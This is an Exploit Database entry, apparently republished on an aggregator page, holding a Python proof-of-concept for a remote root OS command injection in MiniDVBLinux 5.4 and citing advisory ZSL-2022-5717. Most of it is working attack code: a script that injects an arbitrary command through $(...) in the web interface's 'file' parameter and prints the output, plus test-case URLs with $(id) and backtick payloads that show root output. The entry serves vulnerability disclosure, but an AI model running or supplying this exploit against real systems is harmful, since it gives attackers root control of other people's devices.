MiniDVBLinux 5.4 – Remote Root Command Injection

• Exploit Database
• 13 阅读

• 作者： LiquidWorm
  日期： 2023-03-27
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51096/

• # Exploit Title: MiniDVBLinux 5.4- Remote Root Command Injection
  # Exploit Author: LiquidWorm
  #!/usr/bin/env python3
  #
  #
  # MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
  #
  #
  # Vendor: MiniDVBLinux
  # Product web page: https://www.minidvblinux.de
  # Affected version: <=5.4
  #
  # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
  # way to convert a standard PC into a Multi Media Centre based on the
  # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
  # Linux based Digital Video Recorder: Watch TV, Timer controlled
  # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
  # via browser, and a lot more. MLD strives to be as small as possible,
  # modular, simple. It supports numerous hardware platforms, like classic
  # desktops in 32/64bit and also various low power ARM systems.
  #
  # Desc: The application suffers from an OS command injection vulnerability.
  # This can be exploited to execute arbitrary commands with root privileges.
  #
  # Tested on: MiniDVBLinux 5.4
  #BusyBox v1.25.1
  #Architecture: armhf, armhf-rpi2
  #GNU/Linux 4.19.127.203 (armv7l)
  #VideoDiskRecorder 2.4.6
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # @zeroscience
  #
  #
  # Advisory ID: ZSL-2022-5717
  # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php
  #
  #
  # 24.09.2022
  #
  
  import requests
  import re,sys
  
  #test case 001
  #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
  #test case 004
  #http://ip:8008/?site=about&name=blind&file=$(id)
  #cat: can't open 'uid=0(root)': No such file or directory
  #cat: can't open 'gid=0(root)': No such file or directory
  #test case 005
  #http://ip:8008/?site=about&name=blind&file=`id`
  #cat: can't open 'uid=0(root)': No such file or directory
  #cat: can't open 'gid=0(root)': No such file or directory
  
  if len(sys.argv) < 3:
  print('MiniDVBLinux 5.4 Command Injection PoC')
  print('Usage: ./mldhd_root2.py [url] [cmd]')
  sys.exit(17)
  else:
  url = sys.argv[1]
  cmd = sys.argv[2]
  
  req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
  outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
  print(outz.replace('<pre>','').replace('</pre>',''))